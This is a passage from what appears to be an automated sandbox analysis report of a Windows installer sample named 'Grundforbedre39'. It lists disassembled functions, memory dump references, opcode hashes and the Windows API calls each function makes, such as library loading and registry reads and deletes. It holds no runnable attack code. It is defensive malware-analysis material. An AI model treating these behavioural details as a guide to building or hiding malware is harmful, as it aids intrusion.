                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                                                      • Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
                                                                                      • Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                                                      • Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406D18 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                                                      • Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
                                                                                      • Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                                                      • Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406A2E Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                                                      • Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
                                                                                      • Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                                                      • Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406533 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                                                      • Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
                                                                                      • Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                                                      • Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406981 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                                                      • Instruction ID: ff2225f7ed94bd6a4cfd13171a87750c77ef90a01ce87bb0bc5953b87d28885c
                                                                                      • Opcode Fuzzy Hash: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                                                      • Instruction Fuzzy Hash: F3712271E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB281C7795A96DF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406A9F Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                                                      • Instruction ID: 52dfaafe50a83d16d2aca4474dbfbf9792b45fca5ae70f0232ed595026c100c8
                                                                                      • Opcode Fuzzy Hash: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                                                      • Instruction Fuzzy Hash: E7713371E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB291C7795A96DF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004069EB Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                                                      • Instruction ID: fadc0c566b3b685b80e6fde1c1dc985280178bf592964274442c35b5c3ef9333
                                                                                      • Opcode Fuzzy Hash: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                                                      • Instruction Fuzzy Hash: 1D713571E00229DBDF28CF98C844BADBBB1FF44305F15806AD816BB291C7799A96DF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00401FEE
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00403160), ref: 004051D4
                                                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll), ref: 004051E6
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,?,00000001,?), ref: 00401FFF
                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,00000001,?), ref: 0040207C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 334405425-0
                                                                                      • Opcode ID: 288cd279d996e6978258c5401d24f1205cf80aac37a60ccff2d4d3eec1795da4
                                                                                      • Instruction ID: c18903b5dbc92386bcc0ded8fd0819d4ecd3504ae344b6f49c713324e9d388be
                                                                                      • Opcode Fuzzy Hash: 288cd279d996e6978258c5401d24f1205cf80aac37a60ccff2d4d3eec1795da4
                                                                                      • Instruction Fuzzy Hash: 8F219831904219EACF20AFA5CE48A9E7E71AF00354F60427BF511B51E1C7BD8E41DA5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000696,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3677997916-0
                                                                                      • Opcode ID: c3f1b101d7ab7b4636fb7dca452c083d8e471adbd319c2c1a24730d374ee5e78
                                                                                      • Instruction ID: e4ac8c9376200f70c7981abe7f64d2c812767dcd2539a2364c5f8151efcc43ed
                                                                                      • Opcode Fuzzy Hash: c3f1b101d7ab7b4636fb7dca452c083d8e471adbd319c2c1a24730d374ee5e78
                                                                                      • Instruction Fuzzy Hash: 75117331915205EBDB14CFA4DA489BEB7B4FF44354F20843FE405B72D0D6B89A41EB5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                                                                      • Instruction ID: 40f3ddd491d249f73d2fb4fc43cce1b0e50519406e0a546e2fe7b43c981aace9
                                                                                      • Opcode Fuzzy Hash: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                                                                      • Instruction Fuzzy Hash: 2801D131B24210ABE7295B389D05B2A3698E710314F10863EB911F62F1DA78DC138B4D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000696,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteOpenValue
                                                                                      • String ID:
                                                                                      • API String ID: 849931509-0
                                                                                      • Opcode ID: ec2e56ee61c9e08def1d50c1f8a6808fef06f3ab76a6156b5f6b2d5bdcf65ddb
                                                                                      • Instruction ID: 619afea56069f31c127a8e11fd0f1f435edbd74989573f139d652fd0604b037d
                                                                                      • Opcode Fuzzy Hash: ec2e56ee61c9e08def1d50c1f8a6808fef06f3ab76a6156b5f6b2d5bdcf65ddb
                                                                                      • Instruction Fuzzy Hash: 8AF0AF32A04100ABEB10BFB48A4EABE72699B80314F14843BF501B71D1C9FC9D025629
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040156B Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: 4b08649e2767e153eb05ad833bbe1713a4ba0a3d3c758775f708b13ea380d49e
                                                                                      • Instruction ID: 14d99bf0b22e04dc8d6d27e1a0bb6c10309fac34fbb9e600a12b00824ffe684e
                                                                                      • Opcode Fuzzy Hash: 4b08649e2767e153eb05ad833bbe1713a4ba0a3d3c758775f708b13ea380d49e
                                                                                      • Instruction Fuzzy Hash: 5EE04F32B001049BCB24CBA8ED808AE77A6AB88320750453FD902B36A0CA74DC51CF28
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004063F4 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,?,?,004032D3,00000009), ref: 00406406
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                                        • Part of subcall function 00406384: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                                                        • Part of subcall function 00406384: wsprintfW.USER32 ref: 004063D6
                                                                                        • Part of subcall function 00406384: LoadLibraryExW.KERNELBASE(?,00000000,?), ref: 004063EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
